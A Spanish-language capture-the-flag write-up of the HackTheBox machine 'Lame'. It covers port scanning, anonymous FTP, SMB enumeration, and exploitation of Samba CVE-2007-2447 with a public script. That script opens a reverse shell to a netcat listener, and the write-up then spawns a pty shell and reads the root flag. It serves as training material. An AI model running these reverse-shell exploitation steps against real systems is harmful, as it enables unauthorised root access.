Writeup - HackTheBox - Lame

·

3 min read

Writeup -  HackTheBox - Lame

Wirteup Maquina LAME ------------->

hacemos ping para conprobar que tenemos conexión.

ping -c 1 10.10.10.3

Lo primero vamos a descubir que puertos tenemos abiertos con nmap y lo cuardamos en un archivo que llamaremos allPorts

nmap -p- -sS --min-rate 5000 -vvv -n -Pn 10.10.10.3 -oG allPorts

Vemos abiertos los puertos: 21,22,445,139,3632 ahora vemos los servicios expiestos y las versiones pasandole denuevo nmap con un nuevo escaneo:

nmap -sS -sV -p21,22,445,139,3632 10.10.10.3 -oN targeted

Nos muestra los puertos que tenemos abiertos: 21 FTP con el usuario Anonymous activo 22 ssh Openssh 4.7 139 con smb 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.17.115
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Lo mas fácil, sería intentar conectarnos por el puerto 21 por ftp con las creddenciales de anonymous:

ftp 10.10.10.3 21
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:h4nna): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Vemos que no hay nada por ftp.

Intentamos conectarnos por samba puerto 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian:

smbmap -H 10.10.10.3 
[+] IP: 10.10.10.3:445    Name: 10.10.10.3                                        
        Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    print$                                                NO ACCESS    Printer Drivers
    tmp                                                   READ, WRITE    oh noes!
    opt                                                   NO ACCESS    
    IPC$                                                  NO ACCESS    IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$                                                NO ACCESS    IPC Service (lame server (Samba 3.0.20-Debian))

vemos que en tmp podriamos tener acceso, con la herramienta smbmap, vamos a vuscar CVE

smbmap -h

vemos una ruta de diccionario, grepeamos para encontrar CVE relacionadas con esta vulnerabilidad

cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE
                    [ 'CVE', '2007-2447' ],
                    [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]

buscamos este recurso el el buscador: http://samba.org/samba/security/CVE-2007-2447.html no encontramos nada

buscamos por CVE 2007 2447 Encontramos una web que nos reporta todas las vunerabilidades

Buscamos en el navegador repositorios que nos podamos clonar de github:

git clone https://github.com/amriunix/CVE-2007-2447

me pongo en escucha por el puerto nc -nvlp 444

intento ejecutar el usermap_script.py pero no tengo el pyp3 instalado, lo instalo:

wget http://hackersera.com/get-pip.py
sudo python3 get-pip.py

no me lo reconoce, le paso:

atp --fix-broken install

esto era lo que fallba, le instalo la libreria smb al pip3:

pip3 install pysmb

ahora siiii

me pongo por escucha con el:

nc -nlvp 4444

en otra terminal:

python3 usermap_script.py 10.10.10.3 139 10.10.17.115 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

por fin:

whoami
root

tengo que expawnearme una shell:

python -c 'import pty; pty.spawn("/bin/sh")'
ls -la
cd root
cat root.txt

maquina owned!